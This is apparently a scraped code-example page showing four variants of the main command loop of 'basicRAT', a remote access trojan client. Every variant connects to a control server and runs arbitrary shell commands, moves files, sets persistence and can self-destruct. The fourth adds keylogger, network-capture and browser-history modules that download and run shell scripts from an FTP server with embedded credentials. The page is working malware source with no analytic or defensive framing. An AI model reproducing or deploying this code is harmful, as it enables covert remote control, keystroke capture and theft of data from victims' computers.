Esempio n. 1
0
def main():
    conn = socket.socket()
    conn.connect((HOST, PORT))
    client = common.Client(conn, HOST, 1)

    while True:
        results = ''

        # wait to receive data from server
        data = client.recvGCM()

        # don't process empty data
        if not data:
            continue

        # seperate prompt into command and action
        cmd, _, action = data.partition(' ')

        # kill client
        if cmd == 'kill':
            conn.close()
            sys.exit(0)

        # regenerate DH key
        # elif cmd == 'rekey':
        #    client.dh_key = crypto.diffiehellman(client.conn)
        #    continue

        # run a command
        elif cmd == 'execute':
            results = subprocess.Popen(action, shell=True,
                      stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                      stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()

        elif cmd == 'download':
            client.sendfile(action.rstrip())
            continue

        elif cmd == 'upload':
            client.recvfile(action.rstrip())
            continue

        elif cmd == 'persistence':
            results = persistence.run(plat)
            if 'unsuccessful' not in results:
                persistence_applied = True

        elif cmd == 'wget':
            results = toolkit.wget(action)

        elif cmd == 'unzip':
            results = toolkit.unzip(action)

        elif cmd == 'survey':
            results = survey.run(plat)

        elif cmd == 'scan':
            results = scan.single_host(action)

        elif cmd == 'selfdestruct':
            conn.close()
            toolkit.selfdestruct(plat)

        client.sendGCM(results)
Esempio n. 2
0
def main():
    conn = socket.socket()
    conn.connect((HOST, PORT))
    client = common.Client(conn, HOST, 1)

    while True:
        results = ''
        data = client.recvGCM()

        if not data:
            continue

        # seperate prompt into command and action
        cmd, _, action = data.partition(' ')

        # stop client
        if cmd == 'kill':
            conn.close()
            sys.exit(0)

        # run a command
        elif cmd == 'execute':
            results = subprocess.Popen(action,
                                       shell=True,
                                       stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE,
                                       stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()

        # send file
        elif cmd == 'download':
            for fname in action.split():
                fname = fname.strip()
                client.sendfile(fname)
                continue

        # receive file
        elif cmd == 'upload':
            for fname in action.split():
                fname = fname.strip()
                client.recvfile(fname)
                continue

        # regenerate DH key
        # elif cmd == 'rekey':
        #    client.dh_key = crypto.diffiehellman(client.conn)

        elif cmd == 'persistence':
            results = persistence.run(plat)

        elif cmd == 'wget':
            results = toolkit.wget(action)

        elif cmd == 'unzip':
            results = toolkit.unzip(action)

        elif cmd == 'survey':
            results = survey.run(plat)

        elif cmd == 'scan':
            results = scan.single_host(action)

        client.sendGCM(results)
Esempio n. 3
0
def main():
    # determine system platform
    plat = sys.platform
    if plat.startswith('win'):
        plat = 'win'
    elif plat.startswith('linux'):
        plat = 'nix'
    elif plat.startswith('darwin'):
        plat = 'mac'
    else:
        plat = 'unk'

    # connect to basicRAT server
    conn = socket.socket()
    conn.connect((HOST, PORT))
    client = common.Client(conn, HOST, 1)

    while True:
        results = ''

        # wait to receive data from server
        data = client.recvGCM()

        # don't process empty data
        if not data:
            continue

        # seperate data into command and action
        cmd, _, action = data.partition(' ')

        if cmd == 'download':
            client.sendfile(action.rstrip())
            continue

        elif cmd == 'execute':
            results = subprocess.Popen(action,
                                       shell=True,
                                       stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE,
                                       stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()

        elif cmd == 'kill':
            conn.close()
            sys.exit(0)

        elif cmd == 'persistence':
            results = persistence.run(plat)

        # elif cmd == 'rekey':
        #    client.dh_key = crypto.diffiehellman(client.conn)
        #    continue

        elif cmd == 'scan':
            results = scan.single_host(action)

        elif cmd == 'selfdestruct':
            conn.close()
            toolkit.selfdestruct(plat)

        elif cmd == 'survey':
            results = survey.run(plat)

        elif cmd == 'unzip':
            results = toolkit.unzip(action)

        elif cmd == 'upload':
            client.recvfile(action.rstrip())
            continue

        elif cmd == 'wget':
            results = toolkit.wget(action)

        client.sendGCM(results)
Esempio n. 4
0
def main():
    # determine system platform
    plat = sys.platform
    if plat.startswith('win'):
        plat = 'win'
    elif plat.startswith('linux'):
        plat = 'nix'
    elif plat.startswith('darwin'):
        plat = 'mac'
    else:
        plat = 'unk'

    # connect to basicRAT server
    conn = socket.socket()
    conn.connect((HOST, PORT))
    client = common.Client(conn, HOST, 1)

    while True:
        results = ''

        # wait to receive data from server
        data = client.recvGCM()

        # don't process empty data
        if not data:
            continue

        # seperate data into command and action
        cmd, _, action = data.partition(' ')

        if cmd == 'download':
            client.sendfile(action.rstrip())
            continue

        elif cmd == 'execute':
            results = subprocess.Popen(action,
                                       shell=True,
                                       stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE,
                                       stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()

        elif cmd == 'keylogger':
            if action == 'clean':
                action = [
                    'wget -q ftp://siic:[email protected]/keylogger/clean_keylogger.sh',
                    'sh clean_keylogger.sh'
                ]
                for i in range(len(action)):
                    results = subprocess.Popen(action[i],
                                               shell=True,
                                               stdout=subprocess.PIPE,
                                               stderr=subprocess.PIPE,
                                               stdin=subprocess.PIPE)
                    results = results.stdout.read() + results.stderr.read()

            elif action == 'start':
                action = 'sh keylogger/start_keylogger.sh'
                results = subprocess.Popen(action,
                                           shell=True,
                                           stdout=subprocess.PIPE,
                                           stderr=subprocess.PIPE,
                                           stdin=subprocess.PIPE)
                results = results.stdout.read() + results.stderr.read()
                os.system("sh keylogger/keyslooper.sh &")

            elif action == 'stop':
                os.system("kill $(ps aux|grep keyslooper|awk '{print $2}')")

            elif action == 'status':
                action = "if [ \"`ps aux|grep keyslooper |grep sh |grep -v /bin/sh`\" ]; then echo Started; else echo Stopped ;fi"
                results = subprocess.Popen(action,
                                           shell=True,
                                           stdout=subprocess.PIPE,
                                           stderr=subprocess.PIPE,
                                           stdin=subprocess.PIPE)
                results = results.stdout.read() + results.stderr.read()

            elif action == 'install':
                action = [
                    'wget -r -q --no-parent -nH ftp://siic:[email protected]/keylogger/*'
                ]
                for i in range(len(action)):
                    results = subprocess.Popen(action[i],
                                               shell=True,
                                               stdout=subprocess.PIPE,
                                               stderr=subprocess.PIPE,
                                               stdin=subprocess.PIPE)
                    results = results.stdout.read() + results.stderr.read()

            else:
                results = 'use keylogger install | start | stop | clean'

        elif cmd == 'netcapture':
            if action == 'start':
                action = 'wget -r -q --no-parent -nH ftp://siic:[email protected]/netcapture/netcapture.sh'
                results = subprocess.Popen(action,
                                           shell=True,
                                           stdout=subprocess.PIPE,
                                           stderr=subprocess.PIPE,
                                           stdin=subprocess.PIPE)
                results = results.stdout.read() + results.stderr.read()
                os.system("sh netcapture/netcapture.sh &")

            elif action == 'stop':
                action = [
                    'wget -r -q --no-parent -nH ftp://siic:[email protected]/netcapture/netcapture_stop.sh',
                    '. netcapture/netcapture_stop.sh'
                ]
                for i in range(len(action)):
                    results = subprocess.Popen(action[i],
                                               shell=True,
                                               stdout=subprocess.PIPE,
                                               stderr=subprocess.PIPE,
                                               stdin=subprocess.PIPE)
                    results = results.stdout.read() + results.stderr.read()

            else:
                results = 'use netcapture start | stop'

        elif cmd == 'browser_history':
            action = [
                'wget -r -q --no-parent -nH ftp://siic:[email protected]/browser_history/browser_history.sh',
                'sh browser_history/browser_history.sh'
            ]
            for i in range(len(action)):
                results = subprocess.Popen(action[i],
                                           shell=True,
                                           stdout=subprocess.PIPE,
                                           stderr=subprocess.PIPE,
                                           stdin=subprocess.PIPE)
                results = results.stdout.read() + results.stderr.read()

        elif cmd == 'kill':
            conn.close()
            sys.exit(0)

        elif cmd == 'persistence':
            results = persistence.run(plat)

        # elif cmd == 'rekey':
        #    client.dh_key = crypto.diffiehellman(client.conn)
        #    continue

        elif cmd == 'scan':
            results = scan.single_host(action)

        elif cmd == 'selfdestruct':
            conn.close()
            toolkit.selfdestruct(plat)

        elif cmd == 'survey':
            results = survey.run(plat)

        elif cmd == 'unzip':
            results = toolkit.unzip(action)

        elif cmd == 'upload':
            client.recvfile(action.rstrip())
            continue

        elif cmd == 'wget':
            results = toolkit.wget(action)

        client.sendGCM(results)